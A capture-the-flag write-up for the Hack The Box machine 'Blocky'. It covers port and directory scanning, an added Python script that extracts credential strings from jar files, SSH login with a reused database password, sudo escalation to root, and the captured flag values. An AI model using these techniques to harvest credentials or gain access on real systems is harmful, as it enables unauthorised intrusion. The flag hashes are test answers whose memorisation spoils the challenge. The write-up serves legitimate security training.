Blocky-htb-writeup

0x00 Skills Covered

Skills in this chapter: directory scanning, decompiling a jar file to read its source, switching to root with sudo -i

Reference: the official walkthrough

0x01 Obtaining User Access

1. This is an easy box, but also the one I think best matches the OSCP style: it has rabbit holes, yet still offers several possible paths.

2. As usual, first get the target IP address: 10.10.10.37

3. Scan for open ports and service versions

┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV -T4 -Pn 10.10.10.37
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-12 06:25 GMT
Nmap scan report for 10.10.10.37
Host is up (0.043s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d62b99b4d5e753ce2bfcb5d79d79fba2 (RSA)
| 256 5d7f389570c9beac67a01e86e7978403 (ECDSA)
|_ 256 09d5c204951a90ef87562597df837067 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp closed sophos
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

4. The scan reveals a hostname (the http-title line shows an unfollowed redirect to http://blocky.htb), so add it to the local hosts file

┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop]
└──╼ [★]$ echo "10.10.10.37 blocky.htb" | sudo tee -a /etc/hosts
10.10.10.37 blocky.htb

5. Since port 21 is open, I tried anonymous FTP login, without success. I then checked for known vulnerabilities in the ProFTPD, OpenSSH and Apache versions reported by nmap, also without result.

6. The site on port 80 is WordPress. I ran wpscan, looked for vulnerabilities in the detected WordPress version and tried weak credentials on the admin login, all without result...

7. At this point I was stuck. The more boxes I do, the more every version number starts to look like a vulnerability.

8. Because the site was WordPress I had lazily skipped directory scanning. Running it now turns up something unusual

┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop]
└──╼ [★]$ gobuster dir -u http://blocky.htb --wordlist=/usr/share/dirbuster/wordlists/directory-list-1.0.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://blocky.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/12/12 07:54:26 Starting gobuster in directory enumeration mode
===============================================================
/wiki (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/plugins (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/phpmyadmin (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/wp-content (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-admin (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]

9. Browsing the directories found above reveals two jar archives. Download them and decompile them with jd-gui to inspect the contents
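A jar is a plain zip archive, and every compiled class keeps its field names, descriptors and string literals in its constant pool, so hard-coded credentials can be pulled out even without a decompiler. The script below is an added example, not code from the original writeup or from the plugins on the box: it parses only the class-file header and constant pool (JVMS 4.4) and reports strings that match credential-like keywords. The sample jar, class name `com/example/BlockyCore` and the password literal it builds are constructed stand-ins, not the real files or secret found on Blocky.

```python
import io
import re
import struct
import sys
import zipfile

# Payload size (after the 1-byte tag) of every constant-pool entry type that
# carries no string itself; CONSTANT_Utf8 (tag 1) is variable-length.
_FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
               12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def constant_pool_strings(class_bytes):
    """Return every CONSTANT_Utf8 entry of a .class file, in pool order.

    Field names, descriptors and string literals all live here, so this is
    the same data a decompiler shows when a credential is hard-coded.
    """
    magic, = struct.unpack_from(">I", class_bytes, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    count, = struct.unpack_from(">H", class_bytes, 8)
    pos, index, strings = 10, 1, []
    while index < count:
        tag = class_bytes[pos]
        pos += 1
        if tag == 1:
            length, = struct.unpack_from(">H", class_bytes, pos)
            pos += 2
            strings.append(class_bytes[pos:pos + length].decode("utf-8", "replace"))
            pos += length
        elif tag in _FIXED_SIZE:
            pos += _FIXED_SIZE[tag]
        else:
            raise ValueError(f"unknown constant-pool tag {tag} at offset {pos - 1}")
        # CONSTANT_Long and CONSTANT_Double occupy two pool slots (JVMS 4.4.5).
        index += 2 if tag in (5, 6) else 1
    return strings


def find_secrets_in_jar(jar_bytes, keywords=("pass", "jdbc", "user", "secret", "token")):
    """Scan each .class inside a jar; return {member path: [strings matching a keyword]}."""
    pattern = re.compile("|".join(map(re.escape, keywords)), re.IGNORECASE)
    hits = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if not name.endswith(".class"):
                continue  # manifests, resources etc. are skipped
            matched = [s for s in constant_pool_strings(jar.read(name)) if pattern.search(s)]
            if matched:
                hits[name] = matched
    return hits


def _utf8(text):
    data = text.encode("utf-8")
    return b"\x01" + struct.pack(">H", len(data)) + data


def build_sample_class():
    """Constructed minimal class file (not the real plugin); only the header and
    constant pool are meaningful, which is all the scanner reads."""
    pool = [
        _utf8("com/example/BlockyCore"),              # 1  (constructed name)
        b"\x07" + struct.pack(">H", 1),               # 2  CONSTANT_Class -> #1
        _utf8("sqlPass"),                             # 3  field name
        _utf8("Ljava/lang/String;"),                  # 4  descriptor
        _utf8("jdbc:mysql://localhost/wordpress"),    # 5  literal
        b"\x08" + struct.pack(">H", 5),               # 6  CONSTANT_String -> #5
        b"\x05" + struct.pack(">Q", 1234),            # 7-8 CONSTANT_Long (two slots)
        _utf8("Sup3rS3cretPassw0rd!"),                # 9  constructed password literal
        b"\x08" + struct.pack(">H", 9),               # 10 CONSTANT_String -> #9
    ]
    header = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, 11)  # minor, major, cp count
    trailer = struct.pack(">HHH", 0x0021, 2, 0)  # access_flags, this_class, super_class
    return header + b"".join(pool) + trailer


def build_sample_jar():
    """Constructed jar holding the sample class plus a non-class member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("com/example/BlockyCore.class", build_sample_class())
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python jarsecrets.py plugin.jar   (falls back to the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_jar()
    for path, strings in find_secrets_in_jar(data).items():
        print(path)
        for s in strings:
            print("   ", s)
```

Run it against a downloaded jar to get a quick triage list before opening jd-gui; the keyword list is deliberately loose, because the value you want is usually a bare literal sitting next to a field name such as sqlPass rather than a string that names itself.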

10. The decompiled source contains a database username and password. Remembering the usual HTB pattern, I tried SSH as root with that password, which failed; but the site's homepage shows a username.

11. Logging in over SSH with that username and the reused database password succeeds, and the first flag is in the home directory

┌──(kali㉿kali)-[~/桌面]
└─$ ssh notch@10.10.10.37
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul 8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$ pwd
/home/notch
notch@Blocky:~$ ls -la
total 40
drwxr-xr-x 5 notch notch 4096 Jul 8 2022 .
drwxr-xr-x 3 root root 4096 Jul 2 2017 ..
-rw------- 1 notch notch 1 Dec 24 2017 .bash_history
-rw-r--r-- 1 notch notch 220 Jul 2 2017 .bash_logout
-rw-r--r-- 1 notch notch 3771 Jul 2 2017 .bashrc
drwx------ 2 notch notch 4096 Jul 2 2017 .cache
drwxrwxr-x 7 notch notch 4096 Jul 2 2017 minecraft
drwxrwxr-x 2 notch notch 4096 Jul 2 2017 .nano
-rw-r--r-- 1 notch notch 655 Jul 2 2017 .profile
-r-------- 1 notch notch 33 Dec 12 00:23 user.txt
notch@Blocky:~$ cat user.txt
5ca90bc0edb9f99b3b0a33f9ddc79f88
notch@Blocky:~$

0x02 Obtaining Root Access

12. sudo -l shows that notch may run any command as any user ((ALL : ALL) ALL), so sudo -i gives a root shell directly.

notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
(ALL : ALL) ALL
notch@Blocky:~$ sudo -i
root@Blocky:~#
root@Blocky:~# cat /root/root.txt
601338ca4a3ab4f549f0723ea3ae4cca
root@Blocky:~#

0x03 Proof of Completion

https://www.hackthebox.com/achievement/machine/1705469/48

http:\sh1yan.top\photo\


https://sh1yan.top/2023/12/12/Blocky-htb-writeup/
Author
shiyan
Published on
December 12, 2023
License